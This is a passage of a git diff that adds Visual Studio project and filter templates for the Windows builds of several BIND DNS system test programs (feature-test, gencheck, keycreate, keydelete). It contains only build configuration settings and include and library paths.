\ No newline at end of file diff --git a/bin/tests/system/win32/feature-test.vcxproj.filters.in b/bin/tests/system/win32/feature-test.vcxproj.filters.in new file mode 100644 index 0000000..0e4fe58 --- /dev/null +++ b/bin/tests/system/win32/feature-test.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\feature-test.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/feature-test.vcxproj.in b/bin/tests/system/win32/feature-test.vcxproj.in new file mode 100644 index 0000000..92311c9 --- /dev/null +++ b/bin/tests/system/win32/feature-test.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{63A921F6-1200-4723-828A-98960127B73D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>feature-test</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\feature-test.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/feature-test.vcxproj.user b/bin/tests/system/win32/feature-test.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/feature-test.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/gencheck.vcxproj.filters.in b/bin/tests/system/win32/gencheck.vcxproj.filters.in new file mode 100644 index 0000000..33431cf --- /dev/null +++ b/bin/tests/system/win32/gencheck.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\rndc\gencheck.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/gencheck.vcxproj.in b/bin/tests/system/win32/gencheck.vcxproj.in new file mode 100644 index 0000000..12b51d1 --- /dev/null +++ b/bin/tests/system/win32/gencheck.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{764DBE24-C8B3-46E8-BE73-196431353A5D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>gencheck</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\rndc\gencheck.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/gencheck.vcxproj.user b/bin/tests/system/win32/gencheck.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/gencheck.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/keycreate.vcxproj.filters.in b/bin/tests/system/win32/keycreate.vcxproj.filters.in new file mode 100644 index 0000000..09f4c3a --- /dev/null +++ b/bin/tests/system/win32/keycreate.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\tkey\keycreate.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/keycreate.vcxproj.in b/bin/tests/system/win32/keycreate.vcxproj.in new file mode 100644 index 0000000..e4313e9 --- /dev/null +++ b/bin/tests/system/win32/keycreate.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4F9A0F6F-366D-4483-B131-793832840508}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>keycreate</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\tkey\keycreate.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/keycreate.vcxproj.user b/bin/tests/system/win32/keycreate.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/keycreate.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/keydelete.vcxproj.filters.in b/bin/tests/system/win32/keydelete.vcxproj.filters.in new file mode 100644 index 0000000..1e8cb3d --- /dev/null +++ b/bin/tests/system/win32/keydelete.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\tkey\keydelete.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/keydelete.vcxproj.in b/bin/tests/system/win32/keydelete.vcxproj.in new file mode 100644 index 0000000..6c77f65 --- /dev/null +++ b/bin/tests/system/win32/keydelete.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{85ADFF2A-BE31-4B8D-9089-9AD56CE78D7E}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + 